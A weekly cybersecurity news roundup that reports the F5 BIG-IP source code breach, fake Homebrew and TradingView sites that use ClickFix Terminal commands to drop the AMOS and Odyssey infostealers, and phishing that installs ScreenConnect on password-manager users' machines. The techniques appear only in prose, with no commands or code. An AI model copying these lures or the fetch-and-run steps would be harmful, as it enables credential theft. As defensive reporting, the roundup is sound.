October 22nd – This Week’s Top Cybersecurity and Dark Web Stories

F5 suffers breach by nation-state actor

U.S. cybersecurity firm F5 has disclosed a breach of its systems, resulting in the theft of BIG-IP source code and details on undisclosed vulnerabilities. The company attributes the attack to a “highly sophisticated nation-state threat actor” who maintained persistent access to its network.

F5 learned of the breach on August 9, 2025, but delayed public disclosure at the request of the U.S. Department of Justice. While F5 states it has successfully contained the threat, the duration of the attackers’ access to the BIG-IP product development environment remains unstated. The company emphasized no evidence of exploitation of the stolen vulnerabilities in a malicious context, and critical systems like CRM, financial, and iHealth were not accessed.

However, some exfiltrated files from F5’s knowledge management platform did contain configuration or implementation information for a small percentage of customers, who will be directly notified.

In response, F5 has engaged Google Mandiant and CrowdStrike, rotated credentials, strengthened access controls, and enhanced its security architecture. Users are urged to apply the latest updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive (ED 26-01) requiring Federal Civilian Executive Branch agencies to inventory F5 BIG-IP products, ensure networked management interfaces are not publicly accessible, and apply F5’s new updates by October 22, 2025. CISA warns that the stolen data provides the threat actor with a “technical advantage to exploit F5 devices and software,” posing an “imminent threat to federal networks.” Agencies must submit a complete inventory and actions taken to CISA by October 29, 2025.

Bloomberg reported that the attackers were in F5’s network for at least 12 months, utilizing malware dubbed BRICKSTORM, attributed to the China-nexus cyber espionage group UNC5221. Mandiant and Google Threat Intelligence Group (GTIG) previously revealed that this group has targeted legal services, SaaS providers, BPOs, and technology sectors in the U.S. with the BRICKSTORM backdoor.

Google ads for fake sites deliver infostealer malware

A sophisticated new malicious campaign is actively targeting macOS developers, leveraging fake versions of popular platforms like Homebrew, LogMeIn, and TradingView to distribute infostealing malware, including AMOS (Atomic macOS Stealer) and Odyssey.

The attackers employ “ClickFix” techniques, tricking unsuspecting developers into executing specific commands in their Terminal. These commands, often disguised as legitimate installation steps, fetch and decode an ‘install.sh’ file that downloads a malicious payload. This payload then bypasses Gatekeeper prompts and removes quarantine flags, allowing the malware to execute.

Once active, the malware, either AMOS or Odyssey, first checks if it’s running in a virtual machine or analysis system. It then escalates privileges using sudo to run commands as root, collecting detailed hardware and memory information. The malware manipulates system services, such as killing OneDrive updater daemons, and interacts with macOS XPC services to blend its malicious activities with legitimate processes.

Ultimately, the information-stealing components are activated, harvesting sensitive data from browsers, cryptocurrency credentials, and exfiltrating it to a command and control (C2) server.

AMOS, first identified in April 2023, is a malware-as-a-service (MaaS) offering, available for a $1,000/month subscription, capable of stealing a wide array of data. Its creators recently added a backdoor for remote persistent access. Odyssey Stealer, a newer variant documented by CYFIRMA researchers this summer, is derived from Poseidon Stealer, which itself was forked from AMOS. Odyssey targets credentials and cookies from Chrome, Firefox, and Safari, over a hundred cryptocurrency wallet extensions, Keychain data, and personal files, sending them to attackers in ZIP format.

Users are strongly advised against pasting Terminal commands found online unless they fully understand their function and origin.

Phishing campaign targets LastPass and Bitwarden users

An ongoing phishing campaign is actively targeting users of popular password managers LastPass and Bitwarden with fake emails claiming recent hacks. These emails urge recipients to download a “more secure” desktop version of the password manager, which actually installs remote monitoring and management (RMM) tools, Syncro and ScreenConnect, giving threat actors remote access to compromised systems.

LastPass has confirmed that it has not been hacked and that these emails are a social engineering attempt. The phishing messages are well-crafted, often arriving from deceptive domains like ‘hello@lastpasspulse.blog’ or ‘hello@lastpasjournal.blog’. Bitwarden users are also being targeted with similar emails from domains such as ‘hello@bitwardenbroadcast.blog’.

The installed malware hides its system tray icon and is configured to deploy ScreenConnect, allowing attackers to remotely connect, deploy further malware, steal data, and potentially access password vaults.

This campaign follows a recent attack on 1Password users, where phishing emails falsely warned of compromised accounts and directed users to fraudulent landing pages to steal master passwords.

Users of password management tools are strongly advised to ignore such alerts and always log in to the provider’s official website to check for security updates.